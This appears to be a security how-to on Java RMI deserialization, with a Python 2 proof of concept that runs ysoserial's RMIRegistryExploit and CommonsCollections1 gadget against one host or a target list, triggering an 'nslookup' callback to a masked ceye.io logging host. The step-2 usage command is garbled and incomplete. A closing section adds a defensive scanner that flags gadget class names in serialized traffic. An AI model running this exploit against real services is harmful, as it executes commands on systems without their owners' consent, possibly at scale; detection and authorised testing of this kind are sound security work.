1. First, download the commonly used tool ysoserial.
Available here: https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
2. How to use:
    java -cp 1099 "nslookup *******.********.ceye.io"
3. Written as a PoC, as follows:

    #!/usr/bin/python2
    # -*- coding: utf-8 -*-

    import os
    import sys

    # ysoserial RMI registry command; the two %s are the target host and port
    CMD = 'java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit %s %s CommonsCollections1 "nslookup *.*.ceye.io"'

    def check(host, port=1099, infile=None):
        if infile is None:
            # Single target given on the command line
            response = os.popen(CMD % (host, port))
            print(response.read())
        else:
            # One target per line, "host" or "host:port"
            with open(infile, "r") as fr:
                for line in fr.readlines():
                    target = line.split("\n")[0].split("\r")[0]
                    if not target:
                        continue
                    host = target.split(":")[0]
                    port = target.split(":")[-1]
                    # No ":port" suffix: the last field is the host itself
                    if port.find(".") >= 0:
                        port = 1099
                    response = os.popen(CMD % (host, port))
                    print(response.read())

    if __name__ == '__main__':
        parameter = sys.argv[1]
        if parameter.find(":") > 0:
            host = str(sys.argv[1]).split(":")[0]
            port = str(sys.argv[1]).split(":")[-1]
            if port.find(".") > 0:
                port = 1099
            infile = None
        else:
            # An argument without ":" is treated as a file of targets
            infile = str(sys.argv[1])
            host = None
            port = None
        if host != None and host != "":
            if port != None and port != "":
                check(host=host, port=port)
            else:
                check(host=host)
        elif infile != None:
            print("[+] Fileinputstart")
            check(host=None, port=1099, infile=infile)
The result looks like this:
Java deserialization vulnerability detection
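On the defending side, the CommonsCollections1 payload that this check sends is an ordinary Java serialization stream, so it can be recognised in captured traffic or logged request bodies. The following Python 3 scanner is an added example, not code from the original post or from ysoserial: it looks for the stream header and heuristically pulls class names out of class-descriptor records. The gadget class list and the sample byte strings are constructed assumptions.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java STREAM_MAGIC followed by STREAM_VERSION
TC_CLASSDESC = 0x72                 # tag byte that starts a class descriptor
CLASS_NAME = re.compile(rb"[A-Za-z_$\[][\w.$;]*")

# Assumed denylist: classes the CommonsCollections1 chain relies on.
GADGET_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
}

def class_names(data):
    """Heuristically list class names found after the serialization header."""
    start = data.find(STREAM_MAGIC)
    names, i = [], start + len(STREAM_MAGIC)
    while start >= 0 and i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            raw = data[i + 3:i + 3 + length]
            if len(raw) == length and CLASS_NAME.fullmatch(raw):
                names.append(raw.decode("ascii"))
                i += 3 + length  # skip past the name so its bytes are not rescanned
                continue
        i += 1
    return names

def inspect(data):
    """Summarise one captured payload for alerting."""
    names = class_names(data)
    return {"java_serialized": STREAM_MAGIC in data, "classes": names,
            "gadget_hits": sorted(set(names) & GADGET_CLASSES)}

def _classdesc(name):
    """Constructed class descriptor: tag, length, name, dummy serialVersionUID."""
    raw = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw + b"\x00" * 8

# Constructed sample payloads (not captured traffic); 0x73 is TC_OBJECT.
SUSPICIOUS = (b"\x00" + STREAM_MAGIC + b"\x73"
              + _classdesc("sun.reflect.annotation.AnnotationInvocationHandler") + b"\x73"
              + _classdesc("org.apache.commons.collections.functors.InvokerTransformer"))
BENIGN = STREAM_MAGIC + b"\x73" + _classdesc("java.util.ArrayList")

if __name__ == "__main__":
    print(inspect(SUSPICIOUS)["gadget_hits"], inspect(BENIGN)["gadget_hits"])
```

A hit means the stream names gadget classes, not that the receiving service is exploitable; that still depends on a vulnerable commons-collections version being on its classpath and on no deserialization filter being in place.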